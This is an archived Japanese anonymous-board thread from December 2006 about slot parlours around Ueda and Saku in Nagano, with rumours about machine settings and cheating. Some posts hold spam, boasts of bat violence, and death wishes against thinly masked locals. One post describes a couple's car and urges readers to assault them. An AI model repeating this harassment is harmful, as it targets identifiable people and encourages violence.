>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 やんよやんよ
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 おらおらくそどもー
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 俺はやくざからも一目おかれている
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 俺はレディースをまもんよ
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 ともやさまの おでましだー
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 きんぞくぼっこいっかんよ

201 :ともや:2006/12/15(金) 18:00:37 ID:bUmje83C
1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 大波はいいぜーー
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 勝ったら半分よこせやー
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 おらおらくそどもー
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 俺はやくざからも一目おかれている
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 俺はレディースをまもんよ
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 ともやさまの おでましだー
>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1>1 きんぞくぼっこいっかんよ


202 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 20:09:35 ID:CVJAIVEm
ともやって糞ニートは毎日暇なんですね。
やる事ないからメイワク行為しかできないんですね。皆で笑ってあげましょう。

203 :ともや:2006/12/15(金) 20:15:46 ID:bUmje83C
さーてと今日のエジキでも探しいっかな


204 :ともや:2006/12/15(金) 20:18:15 ID:bUmje83C
なめくさった野郎は片っ端から、いっかんよー、俺は、できすぎる男、俺に目つけられたら、血みんよ

205 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 21:48:14 ID:nGI0U6xv
場美出るかなぁ…明日は場美に行くのだが。

206 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 22:27:37 ID:fLm2jQwc
上田場美?

207 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 23:19:01 ID:CVJAIVEm
明日本気出しだろ?上バビボーナス後だし、本気で回収だろうな。
潔く散ってこい!
ま、狙うならムムかナナだろう。

208 :「名無しわざとか?」とかイヤミを言われた:2006/12/15(金) 23:31:28 ID:fLm2jQwc
カイジあたりいきたいんだが6は無いかな?今日も場美秘宝伝でバケラッシュで負けたから勝ちたいです。

209 :ともや:2006/12/15(金) 23:39:34 ID:NvKtAYNg
みなさん 僕 実は アニメオタクなので アニオタともきってこんどから、呼んでねー

210 :「名無しわざとか?」とかイヤミを言われた:2006/12/16(土) 00:04:08 ID:gACiW6Zu
■しっかり選んで、しっかり返済!
http://m-pe.tv/u/?cashsouken
(携帯サイト)

211 :「名無しわざとか?」とかイヤミを言われた:2006/12/16(土) 01:04:35 ID:igQdM3+L
バカ夫婦のお○○らのだんな髪切ったね!素敵!
今時なのに耳テクノカットしてるし(^.^)b流行の最先端だね!師ね!

212 :「名無しわざとか?」とかイヤミを言われた:2006/12/16(土) 02:30:52 ID:t3tnPy8i
ともやって奴、上等だから明日ヤッホーに来い
メンチ切手ホール徘徊しろ
すぐ声かけてやるからよ


213 :「名無しわざとか?」とかイヤミを言われた:2006/12/16(土) 10:25:11 ID:DU0PT0/D
アッー

214 :「名無しわざとか?」とかイヤミを言われた:2006/12/16(土) 10:30:26 ID:9kdZtZK4
↑アーッ!!

215 :「名無しわざとか?」とかイヤミを言われた:2006/12/16(土) 12:19:06 ID:TGhgwSj8
上田場美本気汁全然不発

216 :「名無しわざとか?」とかイヤミを言われた:2006/12/16(土) 12:19:38 ID:yRrT+Ked
上バビはマンボウとウイポが熱いよ!

217 :「名無しわざとか?」とかイヤミを言われた:2006/12/16(土) 15:15:54 ID:yRrT+Ked
上馬美本気汁の報告ヨロ

218 :ともや:2006/12/16(土) 15:32:01 ID:etp1b3i4
ともや貴族にびびりまくりの亀有貴族、ジャブ、390、かっぱ、ドンたちが、ともやの舎弟として、毎日、ぺこぺこしながらびくびくしながらすごしている、なにかあったら、ともやの金属バットがとんでくる、毎日毎日パシリ扱い、恐るべしともや

219 :「名無しわざとか?」とかイヤミを言われた:2006/12/16(土) 20:13:02 ID:cPsiMpXO
↑チンカス↑ お願いだから死んでくれ。

220 :「名無しわざとか?」とかイヤミを言われた:2006/12/16(土) 22:27:49 ID:LIAha7KD
蟻、出てたね。荒人2万枚って(笑)

221 :「名無しわざとか?」とかイヤミを言われた:2006/12/16(土) 23:05:56 ID:5wA769mD
あれ内児やろ。。朝一からして怪しかったが。

222 :「名無しわざとか?」とかイヤミを言われた:2006/12/16(土) 23:45:45 ID:8UCz/mMJ
>220
でもその出方は6じゃないってことじゃん。
ま、うらやましいのは確かだが。

223 :「名無しわざとか?」とかイヤミを言われた:2006/12/17(日) 00:13:08 ID:a85l122b
上田の蟻もめずらしく出てたよ
夕方の時点で万枚超えてたのはやっぱアラジンだったけど

224 :「名無しわざとか?」とかイヤミを言われた:2006/12/17(日) 00:39:46 ID:b823ymFQ
サクラなのかグルなのか・・・


225 :「名無しわざとか?」とかイヤミを言われた:2006/12/17(日) 01:58:35 ID:eEZrAoq4
まっ糞!どこがEの日なんだ!師ねホント!
もう二度とイカネ。この家イベなのに出たことネ!
客も全然いね〜し、潰れるのか?

226 :「名無しわざとか?」とかイヤミを言われた:2006/12/17(日) 12:28:36 ID:KHtG/9Hc
荒人(店名の方)で50万出たってホント?

227 :「名無しわざとか?」とかイヤミを言われた:2006/12/17(日) 12:34:54 ID:t0M6knwU
昨日の勝ち組はどこ?
編む?蟻?バビ?(`・ω・´)
悪はダメだったほ゜(´・ω・`)

228 :「名無しわざとか?」とかイヤミを言われた:2006/12/17(日) 13:15:00 ID:REgNWSv6
他店の客の多さに嫌気がさし、アメリカ上田原でめんそーれ打って10Kすってきた俺は負け組。

229 :「名無しわざとか?」とかイヤミを言われた:2006/12/17(日) 14:39:55 ID:h+N5Sp0K
>>227
オレは1日蟻に行ってたから他は知らないけど
蟻は出てましたよ(`・ω・´)

230 :「名無しわざとか?」とかイヤミを言われた:2006/12/17(日) 20:45:31 ID:KjOPM9HF
前は、万$って地域最強だったよね。バブルの頃の話だけど。

231 :ともや:2006/12/17(日) 21:24:02 ID:2A7L/4bO
http://human5.2ch.net/test/read.cgi/4649/1164598672/

232 :「名無しわざとか?」とかイヤミを言われた:2006/12/17(日) 21:32:44 ID:aOSlInoy
スットコ消しが違法かどうかは知らんが麻雀で1200オーバー(怒)。超醜い。どうせなら蛙シリーズ等切れやすい機種消せばいいのに。
スットコ消しが確定したのでその店は二度と行きません。
多数のお客が目撃してます設定師さん、少しばかりの目先の利益を求めて、客離れが起こりますよ。

233 :「名無しわざとか?」とかイヤミを言われた:2006/12/17(日) 22:41:14 ID:bTv5PSZP
まっ糞は高設定入れる気あるのか?6

234 :「名無しわざとか?」とかイヤミを言われた:2006/12/17(日) 22:42:25 ID:bTv5PSZP
まっ糞は高設定入れる気あるのか?6の日に入れないならいつ入れるんだ。いつもジャグラー打ってるロン毛うざい。

235 :「名無しわざとか?」とかイヤミを言われた:2006/12/17(日) 23:15:48 ID:mjjdzOC+
>>230今はどうなん?

236 :「名無しわざとか?」とかイヤミを言われた:2006/12/18(月) 00:26:34 ID:KFhUBFSG
イッタイどうゆう考えで、今時スロットなんか打つわけ?
金を店に寄付したいから?

237 :「名無しわざとか?」とかイヤミを言われた:2006/12/18(月) 01:10:47 ID:3Ei0WqSf
>>232
それパゴ系?小諸?
店名晒してやれ。

238 :「名無しわざとか?」とかイヤミを言われた:2006/12/18(月) 01:17:50 ID:WLAM+x1M
確かにまっ糞のロン毛キモイな。野郎が来てから設定下がった。ジャグ打ってるやつら恐え〜。
まっ糞って6枚交換なりにいい店だと思ってたけど細菌は醜い店になったな!
常連みたいな人達も細菌は見なくなったな

239 :「名無しわざとか?」とかイヤミを言われた:2006/12/18(月) 03:32:53 ID:gyzX2PxB
最近の夢屋どうなのよ?
レポしてぇ
ってどうせでてねぇんだろうけど

240 :「名無しわざとか?」とかイヤミを言われた:2006/12/18(月) 14:09:25 ID:Vbm+cCWd
はなくそレポしろや
少しは役に立て

241 :「名無しわざとか?」とかイヤミを言われた:2006/12/18(月) 23:21:01 ID:2TeZsfId
はなくそって??
めがね坊主のでくのぼうのこと??

242 :「名無しわざとか?」とかイヤミを言われた:2006/12/19(火) 00:33:40 ID:oRD/m0Hy
そのでくのぼう、
夢屋行くといつもいるよなW
サクラってわけでもなさそうだけど・・

243 :「名無しわざとか?」とかイヤミを言われた:2006/12/19(火) 01:17:49 ID:/wxA3jbq
p

244 :「名無しわざとか?」とかイヤミを言われた:2006/12/19(火) 01:31:23 ID:/wxA3jbq
ちんぽ

245 :「名無しわざとか?」とかイヤミを言われた:2006/12/19(火) 10:15:43 ID:DY4VsWuZ
>>238

246 :「名無しわざとか?」とかイヤミを言われた:2006/12/19(火) 10:20:53 ID:DY4VsWuZ
>>238 わかってくれる人がいたよ。前は6の日とかピースの日は必ずジャグはB40オーバーとか普通に有ったのにあいつらがジャグの高設定打ってから設定下がった。

247 :「名無しわざとか?」とかイヤミを言われた:2006/12/19(火) 18:56:29 ID:qRLJO2wc
>>246
>あいつらがジャグの高設定打ってから設定下がった。

根拠は?
ジャ具は設定判別不可の筈だが。

248 :「名無しわざとか?」とかイヤミを言われた:2006/12/19(火) 19:12:47 ID:wJOX6zMe
28日蟻一周年イベやるらしいが平日やん 休日にやれや むかつく

249 :「名無しわざとか?」とかイヤミを言われた:2006/12/19(火) 19:54:56 ID:iBhn2927
悲しみの街の中野店オープンCM
水着のおねえたん見れるぞ

http://tube.hiroyuki.com/view_video.php?viewkey=5a2e075a1a4a6e1b9770

250 :「名無しわざとか?」とかイヤミを言われた:2006/12/19(火) 23:24:21 ID:DY4VsWuZ
>>247 いつもは5、6っぽい挙動の台が有るのに最近は全く無いんだよね。一ヶ月前に一番左のジャグで6000枚オーバー見てからでも全然30回オーバーしてる台最近がないんだよね。下がったかわからないけど少しは出して欲しい。

251 :「名無しわざとか?」とかイヤミを言われた:2006/12/19(火) 23:35:39 ID:Aku87rah
悪は来年を見据えて着々と5剛毅いれてるな。
スパイダーマンの6うちてーーー

252 :「名無しわざとか?」とかイヤミを言われた:2006/12/19(火) 23:37:23 ID:MUSLenlv
神畑BSの5号機イベント酷いな………
2台ものに6入らなかったり。
ていうか高設定はいつもと同じ連中ばっか。
サクラか?

253 :「名無しわざとか?」とかイヤミを言われた:2006/12/20(水) 14:09:02 ID:14Wu/shR
噂で聞いたけど、編むの沖○チェリーゴ○師に四万枚も抜かれて閉鎖になってるってホント?店員は何で気付かなかったの?
知ってる人教えて。

254 :「名無しわざとか?」とかイヤミを言われた:2006/12/20(水) 15:41:48 ID:NiSWA6cn
>253

理由1.店員がばかだから
理由2.店長とゴト死がつるんでるから
理由2.店員とゴト死がつるんでるから

この中のどれか

アタックちゃ〜んす


255 :「名無しわざとか?」とかイヤミを言われた:2006/12/20(水) 15:56:55 ID:O3OFJQpy
編のチェ〇ー40000枚も出てた日あったか?
それとも被害総額40000枚??
80マン¥??

256 :「名無しわざとか?」とかイヤミを言われた:2006/12/20(水) 16:02:12 ID:f3JO5d/Q
対策してあってもゴトさんはできたの?
あの対策は無意味だったのか。。。
あの台好きだから無くなるなら残念だなあ

257 :「名無しわざとか?」とかイヤミを言われた:2006/12/20(水) 16:15:14 ID:14Wu/shR
あの店町かなりのバカそうだもんね。アイツは前科もある事だし、ゴト死とつるんでた可能性大だな。

258 :「名無しわざとか?」とかイヤミを言われた:2006/12/20(水) 23:26:39 ID:0ukEd7cf
編むの沖○チェ封鎖してた

っていってもあの店のSLOTは上も下も客いなくて
毎日閉鎖してるのと一緒だけどな

259 :「名無しわざとか?」とかイヤミを言われた:2006/12/20(水) 23:46:02 ID:JicTc+AF
盛り下がってまいりました

260 :「名無しわざとか?」とかイヤミを言われた:2006/12/20(水) 23:58:40 ID:52h2K0fe
編むふざけんなよ!ぶっ殺す!


261 :「名無しわざとか?」とかイヤミを言われた:2006/12/21(木) 00:39:00 ID:iA8Nl/VA
沖チェのスレみりゃ判るけど、前々から攻略法は明らかだった。にもかかわらず無対策の店長がばかだってこと。
ネットもだな。

262 :「名無しわざとか?」とかイヤミを言われた:2006/12/21(木) 01:21:05 ID:h02b5E4J
>>252
そのいつもの高設定取る中の一人が
今日CW沖で2000くらいハマってたから、
サクラではない
ていうか今までウザかったけど、
一気にかわいそうになったwww

263 :「名無しわざとか?」とかイヤミを言われた:2006/12/21(木) 01:33:02 ID:EQL8o/ZJ
スレ違いかもしれんが、P−W見たら野パ金曜にまた新装なんだが、月にうるとら入れたばっかじゃねー。
前はよく行ってたが、今行ってなくて、噂で聞いたら客とびが半端じゃないとか。
こんな必死な事やらなきゃらんほど、せっぱつまってるような状況なの?

264 :「名無しわざとか?」とかイヤミを言われた:2006/12/21(木) 01:39:08 ID:bRKbB50H
↑うるせい( ̄□ ̄;)!!
い○○!

265 :「名無しわざとか?」とかイヤミを言われた:2006/12/21(木) 01:51:35 ID:L5is+yOx
編むはある意味
常連がバラエティーコーナーだと思う






266 :「名無しわざとか?」とかイヤミを言われた:2006/12/21(木) 02:18:04 ID:aFyMqgly
マンペイ参上(−_−メ)

267 :「名無しわざとか?」とかイヤミを言われた:2006/12/21(木) 02:21:05 ID:cYBezHhP
マーシー参上(・o・)

268 :「名無しわざとか?」とかイヤミを言われた:2006/12/21(木) 05:30:00 ID:hmBG/+D4
266
ともやに感化されたのか?

269 :「名無しわざとか?」とかイヤミを言われた:2006/12/21(木) 10:17:32 ID:/TxC8Qrm
>>253-255
四万枚ってのはマジ話なのかどうか・・・
一日では無理だろうな。
日数を掛けて、複数人数でなら可能かも・・・

事実だとして、
気付かない店側に落ち度があるのは間違いないが、
常連の連中も相当間抜けだと思われる。
店員取調べ受けるかもな。

>>256
店員もグルなら可能だね。
バーニングサンに行けば
沖縄チェリーに似たような台があるよ。

>>260
既に死んだも同然だよ!!

270 :「名無しわざとか?」とかイヤミを言われた:2006/12/21(木) 13:25:32 ID:igTrh1Oc
↑↑
2台で40000枚らしいよ。常連は早く気付いてバカ店員に教えてやったのに、何の対策もせずみたいだよ。
その前にも鬼○○で同じ位やられてるのにホントに学習能力の無い店だ。

271 :「名無しわざとか?」とかイヤミを言われた:2006/12/21(木) 15:30:16 ID:/JBZo3MU
じゃあ店員とグルは確定ですか?

272 :「名無しわざとか?」とかイヤミを言われた:2006/12/21(木) 18:00:45 ID:igTrh1Oc
つうか、管理者とグルだろう。普通の店じゃありえないよね。その日は管理者だっていたわけだし。

273 :「名無しわざとか?」とかイヤミを言われた:2006/12/22(金) 00:28:47 ID:lPbWMip6
もうスロもう終わってるからぶっちゃけるが…
番長直線の所オール6(メール会員じゃないからわからんが)実際打った
あと、ピンポイント北斗、お粗末、俺空など

常連にバレるかな。

婆三

274 :「名無しわざとか?」とかイヤミを言われた:2006/12/22(金) 00:35:36 ID:9jK4azDe
編むのこーひーねぇたんで背が高いこ
すげー美人じゃぁねぇ?

漏れ的にはかなり
(・∀・)イイ!

275 :「名無しわざとか?」とかイヤミを言われた:2006/12/22(金) 03:07:57 ID:LVb/T6S1
東信って、佐久以外は客レベル激低くない?

276 :「名無しわざとか?」とかイヤミを言われた:2006/12/22(金) 04:09:58 ID:dlyDfpaG
番長が現われた!
勇者ウエッッテーはレバーを強く叩いた。
番長はRT350バケを唱えた
ウエッティーはー10Kのダメージ
ウエッティーの強烈なパンチ、逆に右手を痛める(T_T)
番長はRT1280バケ単発を唱えた
ウエッティーは破産寸前
そこへ浮浪者ニートが現われた!
ケラケラ笑うを唱えた♪
勇者ウエッティーの攻撃力が二倍にになった!!
浮浪者ニートはシバかれ床に倒れた
ニートは床を探した
メダルを見つけた
もう一度探した
メダルを見つけた
ニートはメダル5枚を手に入れた
ニートは肉まんを買った
元気になった
そのころウエッティーは逃げるを選択
すると
レレレのおやじが現われたウッティーの攻撃
レレレは赤く光りだしエラーを唱えた
ウエッティーは逃げ出した

つづく

277 :「名無しわざとか?」とかイヤミを言われた:2006/12/22(金) 08:45:32 ID:nAPYk75q
274
肉付きのいい巨体のコかい?
276
つづきが気になる。ぶっちゃけオモシレーよ(゜o゜)

278 :「名無しわざとか?」とかイヤミを言われた:2006/12/22(金) 09:30:09 ID:NeGItSi1
続きお願いw

279 :「名無しわざとか?」とかイヤミを言われた:2006/12/22(金) 16:24:42 ID:WzFy29+W
今まっ糞に来たらまたジャグにあのロン毛がいるよ。。いつもいつもピンポイントで高設定座ってるな。

280 :「名無しわざとか?」とかイヤミを言われた:2006/12/22(金) 22:27:14 ID:aqjlk1FB
ザケンナ!上田場美!なにが生誕祭じゃ!
出玉通常営業と変わんねーじゃねーか!
全然出ねーぞ 潰れてしまえ!糞店がああああ!

281 :「名無しわざとか?」とかイヤミを言われた:2006/12/22(金) 23:14:45 ID:exp1pDG7
>>280
それがバビクオリティ
あの店は詐欺師

282 :「名無しわざとか?」とかイヤミを言われた:2006/12/22(金) 23:40:26 ID:F4n6VXl7
>>281
>あの店は詐欺師
同意www
いつも派手にイベントうってあの回収だしな。
ヘタに客入るもんだから調子づいてんの丸出し。

283 :「名無しわざとか?」とかイヤミを言われた:2006/12/23(土) 14:07:46 ID:9l15pkZp
276 続きはまだかな?

284 :「名無しわざとか?」とかイヤミを言われた:2006/12/24(日) 00:20:14 ID:vlY/SmOX
ウエッティーってアルフ●ァード乗ってるやつ??

285 :ともや:2006/12/24(日) 03:10:37 ID:DuObcYp1
>>7-77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
>>7-77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
>>7-77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
>>7-77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
>>7-77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777

286 :「名無しわざとか?」とかイヤミを言われた:2006/12/24(日) 07:52:55 ID:ht17L9Wf
とうとう、あの機種が裏になったね。

287 :「名無しわざとか?」とかイヤミを言われた:2006/12/24(日) 12:39:39 ID:hTOhV4rm
浮浪者ニートは風俗割引券を拾った!

*しかし物が多すぎて持てません

┏ 道具━━━┓
┃・貴重品  ┃
┃┏捨てる━━━━┓
┃┃E 携帯    ┃
┗┃E Dio    ┃
┃E 肉まん   ┃
┃→ 童貞    ┃
┃┏━━━━━━┓ ┗┃童貞を   ┃
┃捨てますか?┃ ┃→はぃ ┃
┃ いいぇ ┃
┗━━━━━━┛
┏━━━━━━━━┓
┃それを捨てるなん┃
┃てとんでもない!┃
┃捨てられません。┃
┗━━━━━━━━┛

288 :「名無しわざとか?」とかイヤミを言われた:2006/12/24(日) 18:21:14 ID:hch+FfWS
浮浪者ニートは風俗割引券を拾った!

*しかし物が多すぎて持てません

┏ 道具━━━┓
┃・貴重品  ┃
┃┏捨てる━━━━┓
┃┃E 携帯    ┃
┗┃E Dio    ┃
┃E 肉まん   ┃
┃→ 童貞    ┃
┃┏━━━━━━┓
┗┃童貞を   ┃
┃捨てますか?┃
┃→はぃ ┃
┃ いいぇ ┃
┗━━━━━━┛
┏━━━━━━━━┓
┃それを捨てるなん┃
┃てとんでもない!┃
┃捨てられません。┃
┗━━━━━━━━┛


289 :「名無しわざとか?」とかイヤミを言われた:2006/12/24(日) 19:11:00 ID:G/NpLOKK
24日ってお客さんいるの?

290 :「名無しわざとか?」とかイヤミを言われた:2006/12/24(日) 19:46:26 ID:pgzrP4Qy
人気者の浮浪者ニートに嫉妬

291 :長野人:2006/12/25(月) 12:45:07 ID:FXF9ptEN
BSの店員って可愛い子多いか??

292 :「名無しわざとか?」とかイヤミを言われた:2006/12/25(月) 14:32:46 ID:LjIKoMT5
お○○○ク○ー二ン○のバカ夫婦はどこ行った( ̄□ ̄;)!!
あれホント陰険で頭パックリバカだな!

293 :「名無しわざとか?」とかイヤミを言われた:2006/12/25(月) 14:53:42 ID:IYL+c4xf
>>292
まぁーた何かしただか

294 :「名無しわざとか?」とかイヤミを言われた:2006/12/25(月) 17:45:09 ID:Jr4wIcqz
そんなにムカツク奴らなんですか?

295 :「名無しわざとか?」とかイヤミを言われた:2006/12/25(月) 17:45:57 ID:Jr4wIcqz
そんなにムカツク奴らなんですか?

296 :「名無しわざとか?」とかイヤミを言われた:2006/12/26(火) 00:45:35 ID:da0+8JSp
なあ夢やのドリームってなにを意味するかわかる奴いる?
普通は6って考えるけど、ちっともそれを感じられないんだが・・・
店の関係者の方ここ見てたら、今度メールに意味を曖昧で(大人の事情があるからね)いいんでかいといて。
 
つーか今回の規制って、逆手をとる店にとちゃ渡りに船のような・・・


297 :「名無しわざとか?」とかイヤミを言われた:2006/12/26(火) 01:12:44 ID:jB64e1Tp
     2006年度東信スロットスレ大賞

MVP   浮浪者ニート(編む)

金賞    鬚     (虎)
銀賞    鼻糞乞食眼鏡(夢)
銅賞    拾いのオ○ベ(○) 

新人賞   ともや   (?)

MVP(女)万枚姉ちゃん(針木)

特別賞   小太りウェッティ(編む)





298 :「名無しわざとか?」とかイヤミを言われた:2006/12/26(火) 01:39:02 ID:6LzdwZwy
浮浪者ニートくん MVP受賞おめでとうございます(^O^)貴方に一目惚れして二ヵ月になりますけど、最近ワイルドさを増してきて益々素敵ですよ。

299 :2チャンビギナー:2006/12/26(火) 09:26:26 ID:LM2kK5TG
銅賞のキャラ??ってなんだい?
拾いのお〇べ??拾ったおなべの事…??
んな訳ないよな。
空気よめてなさげでスマソ

300 :「名無しわざとか?」とかイヤミを言われた:2006/12/26(火) 22:37:07 ID:s6JgcdfJ
来年は東信のスロ屋が全部潰れて、平和になりますようにアーメン

301 :「名無しわざとか?」とかイヤミを言われた:2006/12/27(水) 02:08:11 ID:H9uBYzem
夢やの特盛は、毒盛か、特ボリの間違いじゃなかろうか?
みんな今の時期忙しいのかもしれんが、人減ってきたなー。


302 :「名無しわざとか?」とかイヤミを言われた:2006/12/27(水) 19:01:00 ID:1wTkNqzD
上田に引越して来たんですが、設定発表する店ってありますか?札差しなどで。

303 :「名無しわざとか?」とかイヤミを言われた:2006/12/27(水) 19:54:11 ID:2O4+q0hm
バカ夫婦のお○わ○!早く師なね〜かな!
ババー!汚ね〜背中見せるな( ̄□ ̄;)!!若造りしても、ブスだから
旦那!後ろ気を付けろよ

304 :「名無しわざとか?」とかイヤミを言われた:2006/12/27(水) 20:53:59 ID:oU/Ymmgs
○○わらな!
頭わりーバカ夫婦だろ?陰湿でキモいな
栗ーニング屋潰れるから早くシヌよ

305 :「名無しわざとか?」とかイヤミを言われた:2006/12/28(木) 18:34:52 ID:/kyyFjHA
バカ夫婦どこ行った?知ってる椰子いたら教えて下さい!


306 :「名無しわざとか?」とかイヤミを言われた:2006/12/28(木) 18:58:38 ID:WuLeRRkc
おぎ○○のバカ夫婦は、黒のボロ○デッ○ーで徘徊中。
絞めてやれ!

307 :「名無しわざとか?」とかイヤミを言われた:2006/12/28(木) 22:00:57 ID:ktpMnFIT
今日まっ糞がウルトラマン新台で入るから見に行ったけど客付き悪かったなぁ。 番長決定戦やってたからサクッと3000枚。ごち

80 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)